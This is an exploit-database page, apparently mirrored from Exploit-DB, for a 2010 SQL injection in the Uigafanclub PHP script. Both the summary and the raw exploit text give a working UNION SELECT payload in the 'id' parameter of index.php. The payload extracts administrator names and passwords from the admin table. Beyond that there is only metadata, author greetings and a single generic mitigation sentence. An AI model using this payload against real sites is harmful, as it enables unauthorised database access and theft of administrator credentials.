header-logo
Suggest Exploit
vendor:
Uigafanclub
by:
Easy Laster
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Uigafanclub
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Uigafanclub index.php SQL Injection

The vulnerability exists in the Uigafanclub index.php script, which allows an attacker to inject malicious SQL queries via the 'view' and 'id' parameters. The exploit can be triggered by sending a specially crafted HTTP request to the vulnerable script, such as www.site.com/Uigafanclub/index.php?view=photos&id=-9999+Union+Select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+admin--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Uigafanclub index.php SQL Injection
+Autor : Easy Laster
+Date   : 28.02.2010
+Script  : Uigafanclub
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/Uigafanclub/index.php?view=photos&id=
+Exploitable   : www.site.com/Uigafanclub/index.php?view=photos&id=-9999+
Union+Select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+admin--
-----------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR